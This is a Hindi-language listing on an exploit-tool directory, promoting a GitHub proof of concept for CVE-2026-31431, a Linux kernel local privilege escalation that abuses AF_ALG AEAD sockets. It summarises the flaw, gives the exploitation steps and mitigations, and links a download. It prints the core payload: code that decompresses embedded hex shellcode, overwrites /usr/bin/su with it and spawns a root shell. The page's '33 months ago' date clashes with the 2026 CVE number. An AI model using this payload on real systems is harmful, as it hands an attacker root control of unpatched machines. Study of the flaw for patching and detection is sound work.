Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431 — स्थानीय विशेषाधिकार वृद्धि शोषण CVE-2026-31431 के लिए, AF_ALG AEAD सॉकेट हैंडलिंग का दुरुपयोग करके कमजोर Linux कर्नेल पर रूट शेल एक्सेस प्राप्त करने के लिए। | Kitploit
उपकरण/GitHubGitHub/adityabhatt3010/cve-2026-31431
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कशोषणबाइनरी शोषण
GitHubadityabhatt3010/cve-2026-31431

CVE-2026-31431

स्थानीय विशेषाधिकार वृद्धि शोषण CVE-2026-31431 के लिए, AF_ALG AEAD सॉकेट हैंडलिंग का दुरुपयोग करके कमजोर Linux कर्नेल पर रूट शेल एक्सेस प्राप्त करने के लिए।

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📌 CVE-2026-31431 – AEAD क्रिप्टो सॉकेट दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि

🧠 अवलोकन

CVE-2026-31431 एक Linux विशेषाधिकार वृद्धि भेद्यता है जो AF_ALG (कर्नेल क्रिप्टो API) इंटरफ़ेस का दुरुपयोग करती है। AEAD (प्रमाणित एन्क्रिप्शन के साथ संबद्ध डेटा) सॉकेट्स के साथ दुर्भावनापूर्ण इंटरैक्शन बनाकर, एक हमलावर विशेषाधिकार बढ़ा सकता है और रूट के रूप में कोड निष्पादित कर सकता है।

यह भेद्यता क्रिप्टोग्राफिक सॉकेट संचालन के अनुचित हैंडलिंग का लाभ उठाती है, जिससे नियंत्रित मेमोरी हेरफेर और अंततः विशेषाधिकार वृद्धि की अनुमति मिलती है।


⚠️ प्रभाव

  • स्थानीय विशेषाधिकार वृद्धि
  • रूट शेल एक्सेस (/usr/bin/su)
  • कमजोर कर्नेल क्रिप्टो कार्यान्वयन वाले सिस्टम को प्रभावित करता है

🔍 तकनीकी विश्लेषण

एक्सप्लॉइट:

  • एक AF_ALG सॉकेट बनाता है

  • इससे बाइंड करता है:

    root@kitploit:~
    authenc(hmac(sha256),cbc(aes))
    
  • setsockopt और sendmsg के माध्यम से निर्मित पेलोड का उपयोग करता है

  • अनपेक्षित कर्नेल व्यवहार को ट्रिगर करता है

  • इसके माध्यम से रूट शेल में प्रवेश करता है:

    root@kitploit:~
    g.system("su")
    

मुख्य संकेतक:

  • socket(38,5,0) का उपयोग → AF_ALG
  • AEAD हेरफेर
  • संपीड़ित पेलोड (zlib) के माध्यम से नियंत्रित मेमोरी लेखन

💻 प्रूफ ऑफ कॉन्सेप्ट (PoC)

PoC

🔑 मुख्य पेलोड स्निपेट:

**अस्वीकरण: मैं इस PoC का स्वामी नहीं हूं। यह केवल शैक्षिक उद्देश्यों के लिए है, उन वातावरणों में परीक्षण के लिए जहां अनुमति उपलब्ध है। लेखक/स्वामी किसी भी दुरुपयोग के लिए जिम्मेदार नहीं होंगे। **

root@kitploit:~
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

while i<len(e):
    c(f,i,e[i:i+4])
    i+=4

g.system("su")

🚀 एक्सप्लॉइटेशन प्रवाह

  1. क्रिप्टो सॉकेट प्रारंभ करें
  2. AEAD पैरामीटर कॉन्फ़िगर करें
  3. निर्मित पेलोड भेजें
  4. कर्नेल दोष ट्रिगर करें
  5. निष्पादन प्रवाह को अधिलेखित करें
  6. रूट शेल उत्पन्न करें

🛡️ शमन

  • कर्नेल को नवीनतम संस्करण में पैच करें
  • AF_ALG सॉकेट्स तक पहुंच प्रतिबंधित करें
  • LSM (AppArmor/SELinux) नीतियों का उपयोग करें
  • असामान्य क्रिप्टो API उपयोग की निगरानी करें

🙏 श्रेय

  • PoC: https://github.com/theori-io/copy-fail-CVE-2026-31431
टूल डाउनलोड करें